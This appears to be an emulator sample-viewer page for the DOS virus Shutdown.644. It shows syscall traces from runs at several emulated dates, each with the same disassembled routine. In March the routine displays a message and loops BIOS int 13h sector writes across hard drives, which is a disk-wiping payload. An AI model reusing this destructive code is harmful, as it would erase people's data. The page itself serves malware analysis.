Sample viewer

vx.netlux.org/Virus.DOS.Shutdown.644

Syscalls:

Time Syscall Op Syscall Name
2018-12-17T22:51:42.618048681Z 42 PC: 12ad2 | Get date
0x12ad2: cmp dh, 3
0x12ad5: jne 0x12b18
0x12ad7: mov dx, 0x109
0x12ada: mov ah, 9
0x12adc: int 0x21
0x12ade: xor ax, ax
0x12ae0: int 0x13
0x12ae2: mov ax, 0x309
0x12ae5: mov cx, 0x101
0x12ae8: mov dx, 0x80
0x12aeb: int 0x13
0x12aed: inc dh
0x12aef: cmp dh, 5
0x12af2: jne 0x12aeb
0x12af4: inc dl
0x12af6: xor dh, dh
0x12af8: jmp 0x12aeb
0x12afa: push cs
0x12afb: pop ds
0x12afc: mov ax, 0x384
2018-12-17T22:51:42.621919542Z 25 PC: 12b1c | Get default drive
2018-12-17T22:51:42.624369956Z 76 PC: 12a44 | Terminate with return code (Return code = '0')

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":10650,"SideJobID":0}

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:28:43.145728398Z 42 PC: 12ad2 | Get date
0x12ad2: cmp dh, 3
0x12ad5: jne 0x12b18
0x12ad7: mov dx, 0x109
0x12ada: mov ah, 9
0x12adc: int 0x21
0x12ade: xor ax, ax
0x12ae0: int 0x13
0x12ae2: mov ax, 0x309
0x12ae5: mov cx, 0x101
0x12ae8: mov dx, 0x80
0x12aeb: int 0x13
0x12aed: inc dh
0x12aef: cmp dh, 5
0x12af2: jne 0x12aeb
0x12af4: inc dl
0x12af6: xor dh, dh
0x12af8: jmp 0x12aeb
0x12afa: push cs
0x12afb: pop ds
0x12afc: mov ax, 0x384
2018-12-25T12:28:43.148503037Z 25 PC: 12b1c | Get default drive
2018-12-25T12:28:43.151449205Z 76 PC: 12a44 | Terminate with return code (Return code = '0')

{"DateBased":true,"Day":1,"Month":3,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":10650,"SideJobID":0}

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T13:07:14.332185903Z 42 PC: 12ad2 | Get date
0x12ad2: cmp dh, 3
0x12ad5: jne 0x12b18
0x12ad7: mov dx, 0x109
0x12ada: mov ah, 9
0x12adc: int 0x21
0x12ade: xor ax, ax
0x12ae0: int 0x13
0x12ae2: mov ax, 0x309
0x12ae5: mov cx, 0x101
0x12ae8: mov dx, 0x80
0x12aeb: int 0x13
0x12aed: inc dh
0x12aef: cmp dh, 5
0x12af2: jne 0x12aeb
0x12af4: inc dl
0x12af6: xor dh, dh
0x12af8: jmp 0x12aeb
0x12afa: push cs
0x12afb: pop ds
0x12afc: mov ax, 0x384
2018-12-25T13:07:14.334781422Z 9 PC: 12ade | Display string (String= ' Computers must be shutdown to dedicate my sister!')